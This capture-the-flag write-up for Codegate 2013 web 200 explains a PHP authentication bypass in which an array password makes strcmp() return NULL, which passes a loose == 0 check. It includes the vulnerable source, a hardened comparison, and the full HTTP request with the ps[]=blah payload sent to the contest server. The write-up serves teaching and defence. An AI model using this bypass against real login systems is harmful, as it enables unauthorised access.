Codegate 2013 CTF write-ups, web 200

Web 200

This challenge was about a flaw in a PHP comparison function. The source was given, and the following lines were again the interesting ones:

<?php
include("./otp_util.php");

$flag = file_get_contents($flag_file);

if (isset($_POST["id"]) && isset($_POST["ps"])) {
	$password = make_otp($_POST["id"]);
	sleep(3); // do not bruteforce

	// Loose comparison (==): a NULL return from strcmp() also passes this check.
	if (strcmp($password, $_POST["ps"]) == 0) {
		echo "welcome, ".$_POST["id"]."";
		echo "";

		if ($_POST["id"] == "127.0.0.1") {
			echo "<pre>".$flag."</pre>";
		}
	} else {
		echo "<script>alert('login failed..');history.back();</script>";
	}
}
?>

If $_POST['ps'] is an array, strcmp() returns NULL, which is equal to 0 under loose comparison (not identical in type, but == treats NULL and 0 as equal):

$ php -r "var_dump(strcmp('anything',array()));" // returns NULL
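As an added example that is not part of the original write-up, here is the vulnerable comparison next to a hardened one; $password is a constructed stand-in for the output of make_otp(), and vulnerable_check() and hardened_check() are hypothetical names. The NULL return is PHP 5 behaviour; PHP 8 throws a TypeError instead, which the loop below catches.

```php
<?php
// Constructed stand-in for the one-time password make_otp() would produce.
$password = "a1b2c3";

// Vulnerable (hypothetical name): strcmp() on a non-string argument returns NULL
// on PHP 5 (with a warning), and NULL == 0 is true under loose comparison.
// Even `=== 0` would have rejected NULL; the array bypass needs the loose `==`.
function vulnerable_check($password, $ps) {
    return strcmp($password, $ps) == 0;
}

// Hardened (hypothetical name): reject anything that is not a string, then
// compare in constant time. hash_equals() requires both arguments to be strings.
function hardened_check($password, $ps) {
    if (!is_string($ps)) {
        return false;
    }
    return hash_equals($password, $ps);
}

// Constructed inputs standing in for $_POST["ps"].
$inputs = array(
    "correct"      => "a1b2c3",
    "wrong string" => "zzz",
    "array"        => array("blah"),   // what ps[]=blah decodes to
);

foreach ($inputs as $label => $ps) {
    try {
        // @ silences the "expects parameter 2 to be string" warning on PHP 5.
        $v = var_export(@vulnerable_check($password, $ps), true);
    } catch (TypeError $e) {
        $v = "TypeError";                 // PHP 8 refuses the array outright
    }
    $h = var_export(hardened_check($password, $ps), true);
    printf("%-12s vulnerable=%-9s hardened=%s\n", $label, $v, $h);
}
```

On PHP 5 the "array" row shows vulnerable=true beside hardened=false, which is exactly the gap the ps[]=blah request exploits.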

So, I got the flag with the following HTTP request:

POST /site/page/login_ok.php HTTP/1.1
Host: 58.229.122.15:31338
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:19.0) Gecko/20100101 Firefox/19.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://58.229.122.15:31338/site/
Connection: keep-alive
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 19

id=127.0.0.1&ps[]=blah
